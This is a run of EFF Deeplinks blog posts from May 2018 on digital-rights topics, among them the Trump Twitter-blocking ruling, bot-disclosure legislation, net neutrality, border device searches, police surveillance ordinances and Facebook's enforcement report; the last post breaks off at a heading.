Deeplinks

Victory For The First Amendment: Court Rules That Government Officials Who Tweet to the Public Can't Block Users They Disagree With (Wed, 23 May 2018)
Lawsuit Against President Trump Brought by Twitter Users He Blocked

New York, New York—President Donald Trump's blocking of people on Twitter because they criticize him violates the First Amendment, a federal judge in New York ruled today in a resounding victory for freedom of speech and the public's right to communicate opposing political views directly to elected officials and government agencies. The ruling comes in a lawsuit filed by the Knight First Amendment Institute alleging the president and his communications team violated the First Amendment by blocking seven people from the @realDonaldTrump Twitter account because they criticized the president or his policies. The seven individuals include a university professor, a surgeon, a comedy writer, a community organizer, an author, a legal analyst, and a police officer.

The plaintiffs were blocked by Trump on Twitter shortly after they posted critical tweets to the @realDonaldTrump account. President Trump and the other defendants conceded that they did so because they disliked the viewpoints the plaintiffs expressed in their tweets. U.S. District Judge Naomi Reice Buchwald ruled that such viewpoint-based exclusion is "impermissible under the First Amendment." The ruling is a win for the public's right to speak out to public officials and engage with other members of the public on social media.

In an amicus brief filed on behalf of the plaintiffs, EFF argued that governmental use of social media platforms to communicate to and with the public, and to allow the public to communicate with each other, is now the rule of democratic engagement, not the exception. As a result, First Amendment rights of both access to those accounts and the ability to speak in them must apply in full force.

"The court ruling is a major win for the First Amendment rights of the public on social media," said EFF Civil Liberties Director David Greene. "Governmental officials and agencies, big and small, at all levels of government, are using social media to speak to the public and allow the public to speak to them and each other. This development has brought democracy closer to the people. But the people's First Amendment rights to see these messages and respond to them must be respected."

For the ruling: https://knightcolumbia.org/sites/default/files/content/Cases/Wikimedia/2018.05.23%20Order%20on%20motions%20for%20summary%20judgment.pdf
For EFF's brief: https://www.eff.org/document/knight-first-amendment-institute-v-trump
For EFF's analysis of First Amendment rights on social media: https://www.eff.org/deeplinks/2017/11/when-officials-tweet-about-government-business-they-dont-get-pick-and-choose-who

Contact: David Greene, Civil Liberties Director, davidg@eff.org

Vote EFF on CREDO's May Ballot (Wed, 23 May 2018)
Right now you can help EFF receive a portion of a $150,000+ donation pool without even opening your wallet. EFF is one of the three nonprofits featured in CREDO's giving group this month, so if you vote for EFF by May 31 you will help direct a bigger piece of the donation pie toward protecting online freedom! Since its founding, CREDO's network of customers and action-takers has raised more than $85 million for different charities. Each month, CREDO selects three groups to receive a portion of donations that the selected nonprofits then use to drive positive change. Mobile customers generate the funds as they use paid services. Anyone can visit the CREDO Donations site and vote on how to distribute donations among the selected charities. The more votes a group receives, the higher its share of that month's donations. EFF is proud to stand alongside organizations that defend users' rights. In 2016, CREDO revealed that EFF had been representing the company in a long legal battle over the constitutionality of national security letters (NSLs). The FBI has issued unknown numbers of NSL demands for companies' customer information without a warrant or court supervision. NSLs are typically accompanied by a gag order, making it difficult for the recipients to complain or resist, but EFF continues the fight for justice. In the last few weeks we've helped defend your privacy at the border, defeated the "podcasting patent" troll, and pushed the effort to restore net neutrality through the Senate. Help us keep the momentum up by taking a moment to vote for EFF today. We are honored to be one of CREDO's May charities, and we hope you will choose us. You can also support our work by spreading the word on Twitter and Facebook or just becoming an EFF member!

FBI Admits It Inflated Number of Supposedly Unhackable Devices (Wed, 23 May 2018)
We’ve learned that the FBI has been misinforming Congress and the public as part of its call for backdoor access to encrypted devices. For months, the Bureau has claimed that encryption prevented it from legally searching the contents of nearly 7,800 devices in 2017, but today the Washington Post reports that the actual number is far lower due to "programming errors" by the FBI. Frankly, we’re not surprised. FBI Director Christopher Wray and others argue that law enforcement needs some sort of backdoor “exceptional access” in order to deal with the increased adoption of encryption, particularly on mobile devices. And the 7,775 supposedly unhackable phones encountered by the FBI in 2017 have been central to Wray’s claim that their investigations are “Going Dark.” But the scope of this problem is called into doubt by services offered by third-party vendors like Cellebrite and Grayshift, which can reportedly bypass encryption on even the newest phones. The Bureau’s credibility on this issue was also undercut by a recent DOJ Office of the Inspector General report, which found that internal failures of communication caused the government to make false statements about its need for Apple to assist in unlocking a seized iPhone as part of the San Bernardino case. Given the availability of these third-party solutions, we’ve questioned how and why the FBI finds itself thwarted by so many locked phones. That’s why last week, EFF submitted a FOIA request for records related to Wray’s talking points about the 7,800 unhackable phones and the FBI’s use of outside vendors to bypass encryption. The stakes here are high. Imposing an exceptional access mandate on encryption providers would be extraordinarily dangerous from a security perspective, but the government has never provided details about the scope of the supposed Going Dark problem. The latest revision to Director Wray’s favorite talking point demonstrates that the case for legislation is even weaker than we thought. We hope that the government is suitably forthcoming to our FOIA request so that we can get to the bottom of this issue. Related Cases:  Apple Challenges FBI: All Writs Act Order (CA)

Should AI Always Identify Itself? It's more complicated than you might think. (Tue, 22 May 2018)
EFF Opposes California Bill to Require Bot Disclosures

The Google Duplex demos released two weeks ago—audio recordings, one of the company's new AI system scheduling a hair appointment and the other of the system calling a restaurant—are at once unsettling and astounding. The system is designed to enable the Google personal assistant to make telephone calls and conduct natural conversations, and it works; it's hard to tell who is the robot and who is the human. The demos have drawn both awe and criticism, including calls that the company is "ethically lost" for failing to disclose that the caller was actually a bot and for adding human filler sounds, like "um" and "ah," that some see as deceptive. In response to this criticism, Google issued a statement noting that these recordings were only demos, that it is designing the Duplex feature "with disclosure built-in," and that it is going to "make sure the system is appropriately identified."

We're glad that Google plans to build transparency into this technology. There are many cases, and this may be one of them, where it makes sense for AIs or bots to be labeled as such, so that people can appropriately calibrate their responses. But across-the-board legally mandated AI- or bot-labeling proposals, such as a bill currently under consideration in California, raise significant free speech concerns.

The California bill, the B.O.T. Act of 2018 (S.B. 1001), would make it unlawful for any person to use a social bot to communicate or interact with natural persons online without disclosing that the bot is not a natural person. The bill—which EFF opposes due to its overbreadth—is influenced by the Russian bots that plagued social media prior to the 2016 election and spambots used for fraud or commercial gain. But there are many other types of social bots, and this bill targets all of them. By targeting all bots instead of the specific type of bots driving the legislation, this bill would restrict and chill the use of bots for protected speech activities. EFF has urged the bill's sponsor to withdraw the proposal until this fundamental constitutional deficiency is addressed.

While across-the-board labeling mandates of this type may sound like an easy solution, it is important to remember that the speech generated by bots is often simply speech of natural persons processed through a computer program. Bots are used for all sorts of ordinary and protected speech activities, including poetry, political speech, and even satire, such as poking fun at people who cannot resist arguing—even with bots. Disclosure mandates would restrict and chill the speech of artists whose projects may necessitate not disclosing that a bot is a bot. Disclosure requirements could also be hard to effectuate in practice without effectively unmasking protected human speakers, and thus reduce the ability of individuals to speak anonymously. Courts recognize that protecting anonymous speech, long recognized as "a shield from the tyranny of the majority," is critical to a functioning democracy, and subject laws that infringe on the right to anonymity in "core political speech" to close judicial scrutiny. When protected speech is at risk, it is not appropriate to cast a wide net and sort it out later.

That's not to say that all bot-labeling mandates would violate the First Amendment.
There will likely be situations in which targeted labeling requirements may be needed to protect a significant or compelling "government interest"—such as in the context of social bots intended to persuade people to vote for a particular politician or ballot measure, especially if deployed at a scale that allowed those behind the bot to communicate with and potentially influence far more people than if relying on human-operated accounts. But any laws of this type must be carefully tailored to address proven harms. A helpful question to ask here is: "Why does it matter that a bot (instead of a human) is speaking such that we should have a government mandate to force disclosure?" While we understand and sympathize with the desire to know whether you are talking to a bot or a human, talking to a bot that you think is a human does not alone constitute a cognizable First Amendment harm. In the example above, a law targeting large-scale deployment of bots to persuade people to vote for a particular politician or ballot measure, the harm the law would be protecting against is election manipulation. And this harm would not flow from the mere failure to label a bot as a bot; it would flow from the use of bots to manufacture consensus for the purpose of distorting public opinion and swaying election results. Use of bots could hide these efforts; that's why it would matter that a bot (instead of a human) was speaking.

Narrow tailoring is also critical. As a paper by Madeline Lamo and University of Washington Law School Professor Ryan Calo presented at Stanford's We Robot conference in April asks, "Does a concern over consumer or political manipulation, for instance, justify a requirement that artists tell us whether a person is behind their latest creation?" The authors say no, and we agree. Such a provision is not narrowly tailored to address concerns over consumer or political manipulation and will sweep in a great deal of protected speech.

In addition to First Amendment concerns, the California bill illustrates another problem with bot-labeling mandates: difficulties with enforcement. S.B. 1001 requires platforms to create a system whereby users can report suspected bots and, following any reports, "determine whether or not to disclose that the bot is not a natural person or remove the bot" in less than 72 hours. But it isn't always easy to determine whether an account is controlled by a bot, a human, or a centaur (a human-machine team). Platforms can try to use metadata like IP addresses, mouse pointer movement, or keystroke timing to guess, but industrious bot operators can defeat those measures. These measures can also backfire against certain groups of users—such as people who use VPNs or Tor for privacy, who are often inappropriately blocked by sites today, or people with special accessibility needs who use speech-to-text input, whose speech may be mislabeled by a mouse or keyboard heuristic. Platforms can also try to administer various sorts of Turing tests, but those don't work against centaurs, and bots themselves are getting quite good at tricking their way through Turing tests. Some have claimed that Google Duplex, for instance, passed the Turing test by using verbal tics, speaking in the cadence of a natural human voice, and pausing and elongating certain words as if thinking about how to respond.

We warned the California legislature last month that such a system would result in censorship of legitimate and protected speech.
Years of attempts at content moderation by large platforms show that things can go wrong in a panoply of ways. And with an inflexible requirement built upon such subtle and adversarial criteria, S.B. 1001 would predictably cause innocent users to have their accounts labelled as bots, or even have them deleted altogether. As the uproar following Google’s Duplex announcement portends, S.B. 1001 is only the beginning as far as AI- and bot-labeling proposals go. Bot-labeling raises complicated legal and ethical questions. As policy makers across the country begin to consider these proposals, they must recognize the free speech implications of across-the-board bot labeling mandates and craft narrowly-tailored rules that can pass First Amendment scrutiny.

Stupid Patent of the Month: Facebook Joins the Online Dating Arms Race (Tue, 22 May 2018)
Earlier this month, Facebook announced that it will wedge its way into an already-crowded corner of online commerce. The social networking site plans to use its giant storehouse of personal data to create a dating service, promising to help users find "meaningful relationships," not just "hookups," as Facebook CEO Mark Zuckerberg put it. It remains to be seen whether Facebook's new service will be a "Tinder-killer" that users flock to, or a flop for a company that's long been beset with privacy concerns. But there's one thing Facebook, its competitors, and its detractors should all be able to agree on. When a new dating service launches, it should rise or fall based on whether it can win the trust of users—not an arbitrary race to the Patent Office. Unfortunately, well before it built and launched an actual dating service, Facebook engaged in just such a race. The company applied for a stupid patent on "social dating" back in 2013, and earlier this year, the Patent Office granted the application.

Take Established Methods, Add One "Social Graph"

Online dating is a perfect example of a software-based business that truly doesn't need patents to be innovative. Companies have built such services based on what they hope will be useful or attractive to different groups of users, rather than engaging in arguments over who did what first. Patent tiffs are particularly pointless in a space like online dating, which builds on a long history of pre-digital innovation. Placing personal ads in newspapers has a history that dates back more than a century. The first claim of Facebook's US Patent No. 9,609,072 describes maintaining a "social graph" of user connections, then allowing one to request "introductions" to friends-of-friends. Subsequent claims are variations on the theme, like allowing users to include "preferences" and rank their possible matches. This application should have been rejected under the U.S. Supreme Court's 2014 decision in Alice v. CLS Bank. In that case, the high court made it clear that simply adding "do it on a computer"-style jargon to long-established ways of doing business wasn't enough to get a patent. Unfortunately, here, the Patent Office allowed Facebook to pull a similar trick. The company essentially took the idea of introducing available singles through friends-of-friends, added graphics, profiles and the "social graph," and then got a patent on it. The idea of finding good matches is positively ancient, whether people have been looking for the right lover, the right product, or the right business partner. It doesn't warrant a patent, and when patent trolls have claimed otherwise, they haven't fared well in court. "Having two or more parties input preference data is not inventive," wrote U.S. District Judge Denise Cote in 2013, as she dismantled the patent of a shell company called Lumen View Technology LLC. "Matchmakers have been doing this for millennia."

Patently Pointless

To be fair to Facebook, the company may have felt compelled to get its own stupid patent because there are so many other stupid online dating patents out there. In a phenomenon that's the patent equivalent of "mutually assured destruction," many tech companies have stockpiled poor-quality Internet patents simply to have a threat to fight off other companies' poor-quality Internet patents. This arms race, of course, costs many millions of dollars and benefits no one other than patent system insiders. In the world of online dating, wasteful, anti-competitive patent litigation isn't just theoretical.
Earlier this year, Match Group sued up-and-comer Bumble for patent infringement. The suit was brought shortly after Match reportedly tried to purchase Bumble. And in 2015, Jdate sued Jswipe, accusing their competitor of infringing U.S. Patent No. 5,950,200, which tried to claim the idea of notifying people that they “feel reciprocal interest for each other.” It was a basic patent that sought to encompass just about the whole concept of a dating service. This growing web of stupid patent claims won’t stop Facebook from getting into online dating. It won’t stop Facebook’s giant competitors, like Match Group or IAC. But for an entrepreneur who wants to start a new business, the costly dueling patent claims will be a barrier. The battle to win the hearts and minds of online daters should be won with apps and code, not with patents.

EFF Presents Mur Lafferty's Science Fiction Story About Our Fair Use Petition to the Copyright Office (Mon, 21 May 2018)
Section 1201 of the Digital Millennium Copyright Act (DMCA 1201) makes it illegal to get around any sort of lock that controls access to copyrighted material. Getting exemptions to that prohibition is a long, complicated process that often results in long, complicated exemptions that are difficult to use. As part of our ongoing effort to fight this law, we're presenting a series of science fiction stories to illustrate the bad effects DMCA 1201 could have.

It's been 20 years since Congress adopted Section 1201 of the DMCA, one of the ugliest mistakes in the crowded field of bad ideas about computer regulation. Thanks to Section 1201, if a computer has a lock to control access to a copyrighted work, then getting around that lock, for any reason, is illegal. In practice, this has meant that a manufacturer can make the legitimate, customary things you do with your own property, in your own home or workplace, illegal just by designing the products to include those digital locks. A small bit of good news: Congress designed a largely ornamental escape valve into this system: every three years, the Librarian of Congress can grant exemptions to the law for certain activities. These exemptions make those uses temporarily legal, but (here's the hilarious part) it's still not legal to make a tool to enable that use. It's as though Congress expected you to gnaw open your devices and manually change the software with the sensitive tips of your nimble fingers or something. That said, in many cases it's easy to download the tools you need anyway. We're suing the U.S. government to invalidate DMCA 1201, which would eliminate the whole farce.

It's 2018, and that means it's exemptions time again! EFF and many of our allies have filed for a raft of exemptions to DMCA 1201 this year, and in this series, we're teaming up with some amazing science fiction writers to explain what's at stake in these requests. This week, we're discussing our video exemption.

Moving pictures emerged in the late 19th century, but it would take more than a century for video production and distribution to become accessible to nearly everyone, even children. Today, billions of people are able to create, share, and remix more video than the world has ever seen, and as new creators have gotten their hands on the means of production, new forms of creativity and discourse have emerged, delighting and exciting millions, prompting even more creativity and innovation. But even as the tools to create video have gotten easier to use, the rules for using them have gotten much more complicated. Though copyright law contains broad, essential exceptions that allow filmmakers, critics, educators and other users to take excerpts from movies to use in their own works, the use of DRM to lock up video and Section 1201's ban on breaking DRM add real legal risk to this important activity. In previous proceedings, the Copyright Office has granted exemptions allowing certain groups of people to bypass DRM in order to create and educate, but these grants have excluded all kinds of legitimate fair uses. Now that we have years' worth of evidence that bypassing DRM in order to make fair uses didn't harm the film industry, it's time to extend those rights to everyone, and that's why we've asked the Copyright Office to grant a new exemption allowing anyone to get around DRM in order to exercise their fair use rights.
2017 Hugo and Nebula Award nominee Mur Lafferty was kind enough to write us a short science fiction story called "The Unicorn Scene" about the importance of making fair use available to everyone: The Unicorn Scene, by Mur Lafferty Erica put her hand on Mary’s shoulder as her friend scrolled through Netflix. “Look, the idea is brilliant, it hasn’t been done before, it shows leadership, creativity... what?” Mary had just literally head-desk’d. She whapped her head a few more times for emphasis. “That’s not getting anyone anywhere,” Erica said. “What did you find?” “I can’t break the DRM of any of these movies. We can’t get the clips we need,” Mary said, staring at the error message on her screen. Mary was a cinephile. No one had an eye for film like she did. When other kids were reading Hunger Games and Divergent, she was reading critical essays by Pauline Kael and Roger Ebert. She’d expound at length on the metaphorical meaning behind the colors in The Godfather movies before her parents even let her watch the films themselves. There was no doubt she was the biggest film nerd her hometown of Asheville had ever seen, but no one had a guaranteed acceptance to the NY Film Institute. She had organized the Buncombe County Student Film Festival when she’d been a sophomore. That first year, ten people from her school and the parents of the film students had come. Now she was a senior, they needed an auditorium for 800 people after the interest the festival had created. Not to mention a representative of the NY Film Institute would be coming, and interviewing Mary the following day. The problem was, the festival wasn’t going to happen. At least, not how she had envisioned it. This year’s challenge was to take five famous movies and recut them to make a new short film. She’d researched the law – using movies in this way was legal under fair use. It should have been easy to do. Only she couldn’t access any video of the film for editing purposes. “Let me see,” Erica said, looking up information on her phone. “Hey, not all hope is lost. It looks like you can license clips from movies. It may cost you, but what film project is free?” “How much?” Mary asked, her voice flat as if she already knew her answer. Erica was silent for a moment. “How- how many clips do you want to use?” Mary looked down at her notebook where she had sketched out the film using clips from The Princess Bride, The Godfather, The Room, The Cabin in the Woods, and Rosemary’s Baby. She counted for a moment. “Three hundred.” “Do you have three hundred grand lying around?” Erica asked after a moment. “It’s a thousand bucks per clip? I couldn’t even pay for one clip from each movie!” Mary said. “How is this possible? It’s fair use, we aren’t breaking any laws.” “We could bypass the DRM. It’s not hard. I know a girl in my programming class,” Erica said. “Then we would be breaking laws,” Mary pointed out. “I’d go into my interview saying, ‘Hi, Mr. Interviewer. I’m sorry I can’t go to your film school, but I’ll be working for the next fifty years to pay off my fines for breaking DRM in order to use a movie clip in a perfectly legal fair use situation.’” “We might not get caught,” Erica said. Mary’s head hit the table again. “And then again we might...who’s your friend?” “No, you’re right, you will mess up your career if you start it like this,” Erica said. “maybe we can crowdfund one clip.” “Then it’s not a project! It’s a film clip! Who wants to see *just* the unicorn scene from Cabin in the Woods?” Erica sighed. 
“You do realize everybody is going to be hitting this wall, right? Someone is going to bypass the DRM. We’re not going to have a festival with no movies.” “So we’re urging every kid in this festival to break the law?” Mary asked, her voice muffled from talking directly into the table. “The festival is in two weeks,” Erica pointed out. “They probably already have.” Erica leaned on the desk. “So what now?” Two weeks later, Mary sat at the coffee shop with Professor Richard Jenkins opposite her. “Your work was surprising last night,” he said carefully. Mary winced. She had ended up gathering actors and acting out each scene as if they were in the movies, with homemade props and cobbled together scenery. She hadn’t won any of the awards at the festival. “I didn’t want to break the DRM of the videos, and I didn’t have three hundred grand to buy the licenses to the clips,” she said. “It was a creative fix, but clearly done at the last minute.” He paused, as if waiting for her to defend herself. After a moment, she said, “I know it was. I had to weigh possibly getting sued for using a video in a perfectly legal way, or doing something else. I made my choice.” She shrugged. “Starting my college career doing internet courses from prison didn’t sound good... do they even let you take internet courses from debtors’ prison?” “That I don’t know,” he said. “But I think you would be a good candidate to study copyright and DRM with regards to film, now that you know what it’s like to go up against it.” She lifted her head. “Really?” “Don’t get me wrong, your movie was terrible. But I like your style,” he said. “And I think you’d be a good voice for change.” “Lord knows we need it,” Mary said.  

The Path to Victory on Net Neutrality in the House of Representatives and How You Can Help (Fri, 18 May 2018)
The United States Senate has voted to overturn the FCC and restore net neutrality protections, but the fate of that measure now rests in the House of Representatives. While many will think that the uphill battle there makes it a lost cause, that is simply not true. Together, we have the power to win in the House of Representatives.

The Senate has officially voted 52-47 to reverse the FCC's so-called "Restoring Internet Freedom Order" under an expedited procedure known as the Congressional Review Act (CRA), and the measure is now pending a vote in the House of Representatives. Many will incorrectly assume that nothing will come of it because House Republican leadership has expressed its opposition to ever voting on net neutrality, but the wishes of the leadership are frankly irrelevant. What actually matters is whether 218 members of the House of Representatives from either party want to vote to protect net neutrality through a process called a "discharge petition."

What is a Discharge Petition?

In 1931 the House of Representatives created a process where, if a majority of elected officials disagreed with the decision of the Speaker of the House and leadership team, they could force a vote on an issue. From 1967 to 2003, 22 discharge petitions reached the requisite 218 signatures to force a vote on an issue. This happens only when there is overwhelming public pressure from citizens on their House members, because those members have to overrule their leadership's opposition. Net neutrality fits that formula. An overwhelming number of Americans opposed the FCC's decision to repeal net neutrality, with even more Americans registering their opposition in more recent polls (90 percent of Democrats, 82 percent of Republicans, and 85 percent of independents). That strong support makes it possible to put pressure on representatives all across the country to sign the discharge petition. Plus, you have a woefully out-of-touch FCC Chairman who openly mocks people who support net neutrality (which is basically everyone), and so politicians have to decide if they are on his side or with the American people. And you have a nationwide mobilization of small businesses, online video creators, civil rights groups, consumer groups, libraries, and technologists opposing the FCC. Now it's time to channel our forces to get 218 signatures from House Representatives.

We Need Everyone Now

You need to tell your House member to "sign the discharge petition on net neutrality." Too often they will feign support for net neutrality or argue in favor of a fake net neutrality bill that actually legalizes paid prioritization (essentially allowing ISPs to charge websites for priority and slowing down parties that do not pay extra fees). As the polls of public opinion make clear, that position is not about what their constituents want and is more likely related to ISP lobbying and their campaign money. Do not give them that space. Make it clear that signing the discharge petition is the only way they can prove they support a free and open Internet. Supporting the discharge petition is a commitment to supporting net neutrality and voting for keeping the old protections. Anything falling short of signing it is, both in effect and in outcome, a vote against net neutrality. That means calling their office on the phone to make the demand, going to a town hall, or visiting their local district office, and making it clear you want them to sign the discharge petition.
A politician can listen to a constituent demand a vote only so many times before it overwhelms the political money of companies like AT&T and Comcast. They answer to you first at the end of the day. Once your elected official commits to signing the petition, they have to personally sign the document on the floor of the House of Representatives, upon which the document's signer list is updated here. When we get to 218 signatures, the bill will come to the floor for a vote and, if it passes, will go to the President for his signature. At which point, we'll apply the same pressure to him that we did to Congress. Congressman Mike Doyle (D-PA) initiated the discharge process on May 17, the day after the bill passed the Senate. More than 160 members of the House of Representatives have pre-committed to reversing the FCC before that discharge process even started, leaving us with a concrete goal of pressuring the remaining Democrats and Republicans to support the petition. EFF has been tracking the public statements of support and opposition of House members here and has made it easy to call your representative by going here. We have a lot of work ahead of us, but together we can keep the Internet free and open.

Take Action: Save the net neutrality rules

Oakland: The New Gold Standard in Community Control of Police Surveillance (Fri, 18 May 2018)
There is a new gold standard in the movement to require transparency and community engagement before local police departments are permitted to acquire or use surveillance technology. Oakland's Surveillance and Community Safety ordinance builds upon the momentum of several cities and counties that have enacted laws to protect their residents from the unchecked proliferation of surveillance technology with the power to invade privacy and chill free speech. Santa Clara County in Northern California passed the first ordinance of this type in 2016, putting into public view a range of surveillance equipment already in county law enforcement possession and requiring use policies, annual impact reports, and approval at a public hearing before agencies could acquire or use surveillance equipment. Since then, cities across the country, including Seattle, WA; Berkeley, CA; and Davis, CA, have expanded on this model. In addition to reports on the potential risks to civil liberties and privacy, required reporting includes an assessment of whether the surveillance technology's use would impact or has resulted in a disparate impact on a particular segment of their community.

Oakland's Surveillance and Community Safety ordinance raises the floor on what should be expected as additional cities and towns look to embrace these critical protections. For example, Oakland's ordinance more clearly applies the definition of surveillance technology to include software used for surveillance-based analysis. Also, Oakland's ordinance sets a new bar in disclosure by expressly prohibiting city agencies from entering into non-disclosure agreements (NDAs) or any surveillance-related contract that conflicts with the ordinance. For years, courts and communities have been kept in the dark about the use of surveillance technology as a result of NDAs not only with tech vendors but also with federal agencies including the FBI. As a result of these agreements, prosecutors have dropped criminal prosecution of a suspect in order to hide the use of spy tech. And law enforcement officials hide surveillance programs through parallel construction (a practice in which an investigator hides the use of a surveillance program by engineering another plausible way to have obtained the information). The protections in Oakland's ordinance will prevent similar acts of obfuscation from taking place in the city's courts.

With federal agencies expanding their spying programs against immigrants and others, and concern that the federal government in doing so will commandeer the surveillance programs of state and local governments, the police surveillance transparency movement continues to gain momentum on the local and state level. Already residents and lawmakers in St. Louis, Boston, and elsewhere are discussing how to build upon existing examples to codify these protections in their own cities. In California, S.B. 1186 would assure that cities and counties throughout the state share in this level of local protection and the opportunity for residents to help decide whether their local police may acquire or use surveillance technology. EFF will continue to work with our Electronic Frontier Alliance allies, like Privacy Watch STL and the Citizens Network of Protection, to help develop and pass comprehensive legislation assuring civil liberties and essential privacy. To find an Electronic Frontier Alliance member organization in your community, or to learn how your group can join the Alliance, visit eff.org/fight.

All California Kids Deserve Internet Access—Including Youth in Detention and Foster Care (Thu, 17 May 2018)
A 2014 report by the National Institute of Justice, part of the Department of Justice's Office of Juvenile Justice and Delinquency Prevention, highlighted the counterproductive nature of punitive policies in the juvenile justice system. They simply don't work. It would be more effective to provide incarcerated youth with educational opportunities so they don't fall behind their peers, ensuring they have a fair shot at integrating back into society. California has an opportunity to accomplish exactly this by providing the state's juvenile offenders with access to quality education resources through the Internet.

Juvenile facilities and state-run foster care programs across California are not currently required to provide youth with Internet access for educational purposes. Assemblymember Mike Gipson introduced a bill, A.B. 2448, that aims to fix this problem. The bill ensures that juvenile detention facilities provide youth with access to the Internet and computer technology for educational purposes. It also encourages those facilities to provide Internet access for youth to remain in contact with family members. Additionally, youth in foster homes will be given access to the Internet for age-appropriate enrichment and social activities. EFF fully supports this bill to give youth access to the connecting and educational power of the Internet. Our support letter states:

When youth are incarcerated, it is the government's duty to ensure that they receive the necessary services for rehabilitation and successful integration back into the free world. In the modern era, computer literacy and skills are crucial, particularly when it comes to gaining employment, and thus being a contributing member of society. Additionally, since many juvenile facilities are located in remote areas, placing youth far from their homes, the state should use modern technology to allow detainees to maintain meaningful relationships with their families to form and enhance the necessary support structure for a successful rehabilitation. Isolating the youth will adversely affect the State's goal to integrate them back into society. Similarly, youth in foster care must also have access to computer technology and Internet on par with what most children receive through their schools, libraries, and homes. Since foster youth are much more likely to have experienced violence and other forms of trauma, it is imperative that the state of California do all that it can, to the extent possible, to ensure that they have an experience similar to their peers outside the foster care system for better behavioral and emotional development.

We supported a previous version of the bill that Gov. Jerry Brown vetoed. The new version addresses the concerns raised in the veto message, and we hope it will garner Gov. Brown's signature and become law. Over the years, California has implemented many innovative programs to rehabilitate California's youth within its care, including teaching them how to code. The passage of A.B. 2448 will further help the state ensure that its youth have a chance to become productive members of society. The bill is currently pending in the California Assembly Appropriations Committee, and we hope that lawmakers advance this bill swiftly.

EFF to New York Appellate Court: No Warrantless Searches of Devices at the Border (Wed, 16 May 2018)
In a month of court victories for travelers' digital privacy, EFF continues its legal fight for Fourth Amendment rights at the border. We filed an amicus brief yesterday, along with the ACLU and NYCLU, urging a New York State appellate court to rule that border agents need a probable cause warrant to search the electronic devices of people at international airports and other border crossings. We asked the court to rule that the extremely strong and unprecedented privacy interests we have in the massive amount of highly sensitive information stored and accessible on electronic devices are protected under the Constitution. This is our eighth amicus brief in a case where border agents have conducted warrantless searches of travelers' phones or laptops at the border. For too long, federal agents have treated the border as a Constitution-free zone, searching travelers without individualized suspicion that they have committed a crime. This must stop.

As in our prior amicus briefs in border search cases, we argued in yesterday's brief that the New York court should apply the analytical framework used by the U.S. Supreme Court in Riley v. California. There, the court held that police must obtain a warrant to search the cell phones of people who have been arrested, after balancing the public's heightened privacy interest in their cell phones against the government's interests. Travelers at the border have the same privacy interests in the information contained on their electronic devices. In the case before the New York court, People v. Perkins, border agents stopped a traveler at JFK International Airport after a flight from Canada. The agents searched his iPad without a warrant, and discovered contraband.

A growing number of courts recognize that the Fourth Amendment protects digital privacy at the border. Earlier this month, for example, ruling in U.S. v. Kolsuz, a federal appeals court held that individualized suspicion is required for a forensic search of an electronic device seized at the border. In doing so, the Kolsuz court recognized the unique privacy interests that travelers have in their digital data. In Alasaad v. Nielsen, EFF's civil lawsuit against warrantless border device searches (along with the ACLU), we recently won another victory for travelers' privacy rights. A federal court in Boston ruled on May 9 that our lawsuit against the Department of Homeland Security could proceed. The court explained, based significantly on Riley, that "electronic devices implicate privacy interests in a fundamentally different manner than searches of typical containers or even searches of a person." We are encouraged by the rulings in Kolsuz and Alasaad, and hope courts in the other pending cases, including Perkins, will protect travelers' Fourth Amendment rights at the border.

Related Cases: United States v. Saboonchi; Riley v. California and United States v. Wurie; Alasaad v. Nielsen

The Senate Voted to Stand Up for Net Neutrality, Now Tell the House to Do the Same (Wed, 16 May 2018)
The Senate has voted to restore the 2015 Open Internet Order and reject the FCC's attempt to gut net neutrality. This is a great first step, but now the fight moves to the House of Representatives. The final Senate vote was 52 to 47 in favor. That puts a bare majority of the Senate in step with the 86% of Americans who oppose the FCC's repeal of net neutrality protections.

Net neutrality means that the company that controls your access to the Internet should not also control what you see and how quickly you see it once you're there. We pay our ISPs plenty of money for Internet access; they shouldn't have the ability to block or throttle any application or website we choose to use or visit. And they shouldn't get to charge extra to deliver some content faster while slowing down others, or get to prioritize their own content over that of competitors. The 2015 Open Internet Order was a great victory in banning blocking, throttling, and paid prioritization by ISPs. But under Chairman Ajit Pai, the FCC undid that good work by repealing the order and abandoning any responsibility for oversight. And it did so despite the huge number of Americans calling on it not to, and despite the incorrect assumptions about how the Internet works that underlie its reasoning. The so-called "Restoring Internet Freedom Order" does nothing of the kind, and it's good to see the Senate acting to stop the FCC.

Despite the fact that millions of Americans of all stripes want to keep net neutrality, the number of House members supporting the Congressional Review Act (CRA) resolution there languishes below the 218 needed to pass. The Senate has led the way; now it's time for the House of Representatives to step up, especially as the net neutrality rules are set to expire in June. You can see where your representatives stand here, and then give them a call telling them to use the Congressional Review Act to save the Open Internet Order.

Take Action: Save the net neutrality rules

Facebook Releases First-Ever Community Standards Enforcement Report (Wed, 16 May 2018)
For the first time, Facebook has published detailed information about how it enforces its own community standards. On Tuesday, the company announced the release of its Community Standards Enforcement Preliminary Report, covering enforcement efforts between October 2017 and March 2018 in six areas: graphic violence, adult nudity and sexual activity, terrorist propaganda, hate speech, spam, and fake accounts. Facebook follows YouTube in releasing content enforcement numbers; last month, the video-sharing platform put out its first transparency report on community guidelines enforcement, showing the total number of videos taken down, the percentage of videos removed after being flagged by automated tools, and other details.

What's good

The publication marks a sea change in how companies approach transparency reporting and is a good first step. Although advocates have long pushed for Facebook and other social media platforms to release details on how they enforce their guidelines—culminating with the recently-released Santa Clara Principles on Transparency and Accountability in Content Moderation—companies have largely been reticent to publish those numbers. Pushes from advocacy organizations, academics, and other members of civil society have undoubtedly led us to this moment. The report aims to address four points for enforcement of each of the six aforementioned community standards: the prevalence of Community Standards violations; the amount of content upon which action is taken; the amount of violating content found and flagged by automated systems and human content moderators before users report it; and how quickly the company takes action on Community Standards violations.

Looking at the first of the six categories—graphic violence—as an example, some of the numbers are staggering. In the first three months of this year, Facebook took action on more than 3 million pieces of content, up from just a little over 1 million in the last three months of 2017. The company notes that disparities in numbers can be affected by external factors—"such as real-world events that depict graphic violence"—and internal factors, such as the effectiveness of its technology in finding violations. Facebook also offers insight into the 70% increase in the first quarter of this year, noting that its photo-matching software is now used to cover certain graphic images with warnings.

The metrics offer a fascinating look into the capabilities of automated systems. When it comes to imagery—be it graphic violence or sexually explicit content—Facebook's success rate in detecting and flagging content is incredibly high: well over 90% in every category except hate speech, where the company detected only 38% of violating content in the first quarter. This makes sense: as opposed to imagery, Standards-violating speech is more complicated to detect and often requires the nuanced eye of a human moderator. It's a good thing that the company isn't relying on technology here.

What's not-so-good

